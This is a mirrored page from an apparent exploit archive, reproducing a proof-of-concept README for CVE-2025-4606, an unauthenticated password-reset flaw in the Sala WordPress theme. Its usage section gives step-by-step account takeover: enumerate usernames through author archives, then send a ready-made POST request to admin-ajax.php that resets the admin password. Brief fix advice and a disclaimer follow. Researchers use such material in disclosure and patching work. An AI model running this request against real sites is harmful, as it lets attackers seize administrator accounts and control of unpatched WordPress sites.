Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-4606 PoC — WordPress plugin Sala 安全漏洞

Source
https://github.com/Yucaerin/CVE-2025-4606
Associated Vulnerability
Title:WordPress plugin Sala 安全漏洞 (CVE-2025-4606)
Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin Sala 1.1.4及之前版本存在安全漏洞,该漏洞源于未正确验证用户身份,可能导致账户接管和权限提升。
Description
Sala - Startup & SaaS WordPress Theme <= 1.1.4 - Unauthenticated Privilege Escalation via Password Reset/Account Takeover
Readme
# CVE-2025-4606- WordPress Sala Theme <= 1.1.4 - Unauthenticated Privilege Escalation via Password Reset/Account Takeover

🔥 **Vulnerability Summary**  
The WordPress theme Sala versions <= 1.1.4 is vulnerable to an **unauthenticated privilege escalation** vulnerability. This flaw allows **unauthenticated attackers** to reset passwords of arbitrary users — including administrators — by directly invoking an exposed AJAX endpoint without verifying the identity of the requester.

This vulnerability stems from the `change_password_ajax` function registered to `wp_ajax_nopriv_`, which sets a new password for any valid user login without checking if the request is authorized.

🔍 **Affected Theme**
- **Theme Name:** Sala – Startup & SaaS WordPress Theme
- **Affected Version:** <= 1.1.4
- **Vulnerability Type:** Unauthenticated Privilege Escalation
- **CVE ID:** CVE-2025-4606
- **CVSS Score:** 9.8 (Critical)
- **Impact:** Complete Account Takeover (Including Admin)

🧪 **Exploit Features**
- 🔓 **No authentication required**
- 🔄 **Overwrites any user’s password** by providing a valid login name
- 📬 **Targets the AJAX endpoint** `/wp-admin/admin-ajax.php?action=change_password_ajax`
- 🧠 **Works instantly** if the attacker knows a valid username (e.g., admin)

🧠 **Researcher**
- Credit: [Thai An](https://www.wordfence.com/threat-intel/vulnerabilities/researchers/thai-an-thai-an)

🚀 **Usage**
1. Identify a valid username on the target WordPress site. You can do this by checking:
   - Public author archive URLs (`/author/username`)
2. Craft the following POST request to reset the user’s password:

   ```http
   POST /wp-admin/admin-ajax.php HTTP/1.1
   Host: targetsite.com
   Content-Type: application/x-www-form-urlencoded

   action=change_password_ajax&login=admin&new_password=hacked123
   ```

3. If successful, you can now log in as the targeted user using the new password (`hacked123` in the example above).
4. Visit `/wp-login.php` and verify access.

🛠 **Fix Recommendations**
- Theme developers should remove or secure the `wp_ajax_nopriv_change_password_ajax` hook.
- Always check `is_user_logged_in()` and verify the identity of the user before allowing sensitive actions.
- Implement nonce checks to prevent CSRF and unauthenticated abuse.

🔒 **Disclaimer:**  
This information is provided for educational and authorized penetration testing purposes only. Unauthorized exploitation of systems is illegal and unethical.

📚 **Reference:**  
- [Wordfence Advisory](https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/sala/sala-startup-saas-wordpress-theme-114-unauthenticated-privilege-escalation-via-password-resetaccount-takeover)
File Snapshot

 [4.0K]  /data/pocs/f69096039cc67abbecae62d317f14b0dde3747d8
├── [ 758]  exp.py
└── [2.7K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.